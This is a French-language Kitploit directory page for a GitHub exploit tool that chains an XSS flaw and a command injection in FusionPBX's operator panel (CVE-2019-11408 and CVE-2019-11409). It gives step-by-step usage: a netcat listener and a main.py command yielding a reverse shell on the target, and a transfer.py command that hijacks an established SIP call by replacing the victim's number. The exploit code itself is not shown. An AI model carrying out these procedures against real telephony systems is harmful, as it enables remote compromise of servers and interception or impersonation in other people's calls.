Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
fusionpbx_rce_vulnerability — Enchaînement CVE-2019-11408 – XSS dans le panneau d'opérateur et CVE-2019-11409 – Injection de commande dans le panneau d'opérateur. | Kitploit
Outils/GitHubGitHub/hoseynheydari/fusionpbx_rce_vulnerability
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubhoseynheydari/fusionpbx_rce_vulnerability

fusionpbx_rce_vulnerability

Enchaînement CVE-2019-11408 – XSS dans le panneau d'opérateur et CVE-2019-11409 – Injection de commande dans le panneau d'opérateur.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 2 ansPas encore vérifié

Prélude

Ce simple code tente de compléter l'implémentation de la vulnérabilité en chaîne introduite par Dustin Cobb dans RCE via l'identifiant de l'appelant – Multiples vulnérabilités dans FusionPBX.

RCE

Étapes de reproduction

  1. Visualisez l'écran d'opérateur vulnérable dans un navigateur web, situé dans cet exemple à https://{fusionpbx_address}/app/operator_panel/index.php
  2. Démarrez un écouteur netcat sur un système distant (rce_listener_address).x`
  3. Exécutez le code d'exploitation ci-dessous sur le système distant dans une autre fenêtre de terminal python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}
  4. L'exploit se connectera à l'écouteur netcat et fournira un reverse shell

Remplacer un appel

Alors que nous connaissons le Call-ID, from-tag et to-tag d'un appel, l'exécution du code ci-dessous vous remplacera à la place de la victime dans l'appel.

Étapes de reproduction

  1. Initiez d'abord un appel entre deux SIP UA.
  2. Une fois l'appel établi, nous devons construire dialog_identifier en concaténant {Call-ID}{semicolon}"to-teg:"{to-tag}"from-tag"{from-tag}.
  3. Exécutez le code du détourneur ci-dessous sur le système distant et remplacez-vous par le numéro de la victime. python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}
Télécharger l’outil